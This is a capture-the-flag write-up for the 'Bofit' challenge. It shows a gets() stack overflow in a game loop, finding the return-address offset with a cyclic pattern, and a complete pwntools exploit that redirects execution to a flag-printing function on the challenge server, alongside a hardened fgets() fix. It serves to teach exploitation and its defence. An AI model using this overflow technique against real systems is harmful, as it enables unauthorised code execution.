
# Bofit

## Challenge

Because Bop It is copyrighted, apparently

nc umbccd.io 4100

Author: trashcanna

## Solution

We want to jump here:

```c
void win_game(){
    char buf[100];
    FILE* fptr = fopen("flag.txt", "r");
    fgets(buf, 100, fptr);
    printf("%s", buf);
}
```

Using Radare2, the address of `win_game()` is 0x00401256.

![](/files/-M_EDbc-FAt9aY6b6_DY)

```c
int play_game(){
    char c;
    char input[20];
    int choice;
    bool correct = true;
    int score = 0;
    srand(time(0));
    while(correct){
        choice = rand() % 4;
        switch(choice){
            case 0:
                printf("BOF it!\n");
                c = getchar();
                if(c != 'B') correct = false;
                while((c = getchar()) != '\n' && c != EOF);
                break;

            case 1:
                printf("Pull it!\n");
                c = getchar();
                if(c != 'P') correct = false;
                while((c = getchar()) != '\n' && c != EOF);
                break;

            case 2:
                printf("Twist it!\n");
                c = getchar();
                if(c != 'T') correct = false;
                while((c = getchar()) != '\n' && c != EOF);
                break;

            case 3:
                printf("Shout it!\n");
                gets(input);
                if(strlen(input) < 10) correct = false;
                break;
        }
        score++;
    }
    return score;
}
```

In the above function, cases 0 to 2 read a single character with `getchar()` and then drain the rest of the line, so they cannot write past any buffer. The "Shout it!" case instead calls `gets()`, which never checks the input length against the 20-byte `input` buffer and is therefore a textbook stack buffer overflow.
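As an added example (not the challenge's code or the writeup's), this is how the "Shout it!" round could be written without `gets()`: `fgets()` bounds the read to the 20-byte `input` buffer and any excess is drained the same way the other three cases already do, so the game rule (10 or more characters is correct) is unchanged but the saved return address can no longer be reached. The `demo_rounds()` driver, its `tmpfile()` stand-in for stdin and the sample lines are constructed for illustration.

```c
#include <stdbool.h>
#include <stdio.h>
#include <string.h>

#define INPUT_CAP 20  /* the same 20-byte input[] buffer the challenge declares */

/* Read one line into buf (capacity cap), strip the newline, and drain any
 * excess characters so an overlong line can neither overflow buf nor be
 * misread as the next round's answer. Returns the stored length, or -1 at EOF. */
static int read_line_bounded(FILE *in, char *buf, size_t cap) {
    if (fgets(buf, (int)cap, in) == NULL) { buf[0] = '\0'; return -1; }
    size_t len = strlen(buf);
    if (len > 0 && buf[len - 1] == '\n') {
        buf[--len] = '\0';                     /* the whole line fit */
    } else {
        int c;                                 /* line was longer than cap-1 bytes */
        while ((c = getc(in)) != '\n' && c != EOF) ;
    }
    return (int)len;
}

/* Hardened "Shout it!" round: same rule as the challenge (10+ characters is
 * correct), but the read is bounded by sizeof input instead of using gets(). */
static bool shout_it(FILE *in) {
    char input[INPUT_CAP];
    return read_line_bounded(in, input, sizeof input) >= 10;
}

/* Constructed rounds: a short answer, a valid one, a 100-byte line (the overflow
 * attempt), then one more line that must still be read intact. True if all behave. */
static bool demo_rounds(void) {
    char data[160] = "short\nlong enough answer\n";
    size_t n = strlen(data);
    memset(data + n, 'A', 100);                /* constructed 100-byte shout */
    memcpy(data + n + 100, "\nB\n", 4);        /* next round's answer: 'B' */
    FILE *in = tmpfile();                      /* stand-in for stdin */
    if (in == NULL) return false;
    fwrite(data, 1, strlen(data), in);
    rewind(in);
    char next[INPUT_CAP];
    bool ok = shout_it(in) == false            /* "short": 5 chars, wrong */
           && shout_it(in) == true             /* 18 chars, correct */
           && shout_it(in) == true             /* truncated to 19 chars, no overflow */
           && read_line_bounded(in, next, sizeof next) == 1 && next[0] == 'B'
           && read_line_bounded(in, next, sizeof next) == -1;
    fclose(in);
    return ok;
}
int main(void) { printf("hardened rounds behave: %s\n", demo_rounds() ? "yes" : "no"); return 0; }
```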

We can play the game until "Shout it!" appears and pass in the output of `msf-pattern_create -l 1000` as the input. When the game ends and the function returns, the program crashes, and the crash shows which part of the pattern ended up in the saved RIP.

![](/files/-M_EDvdSjYXy8UAe421l)

Looking up that value in the pattern tells us the offset to the saved RIP is 56.

![](/files/-M_EE7LSfF3WdTcqdcen)

We have the info we need to craft our payload! The only trick here is to implement some logic to "play the game" until "Shout it!" comes up. After sending our payload and overwriting the saved RIP, we need to give a "wrong" input so that the function returns.

```python
from pwn import *

win_game = 0x00401256   # address of win_game(), found with Radare2
offset = 56             # bytes from the start of input[] to the saved RIP

# Pad up to the saved RIP and replace it with win_game(). p64() writes the full
# 8-byte return address; gets() reads the NUL bytes fine, stopping only at '\n'.
payload = b"A" * offset + p64(win_game)
print(payload)

conn = remote('umbccd.io', 4100)
conn.recvuntil(b'BOF it to start!')

# "Play" until the vulnerable round appears. Echoing each prompt back is a valid
# answer: its first character is the expected letter ('B', 'P' or 'T') and the
# getchar() loop in play_game() discards the rest of the line.
line = conn.recvline()
while b'Shout it!' not in line:
    conn.send(line)
    line = conn.recvline()

# The shout is well over 10 characters, so it counts as correct and the loop goes on...
conn.send(payload + b"\n")
conn.recvline()
# ...until this wrong answer ends the game and play_game() returns into win_game().
conn.send(b"A" + b"\n")
print(conn.recv())

conn.close()
```

![](/files/-M_EEMgtXjK8XhjQV29h)
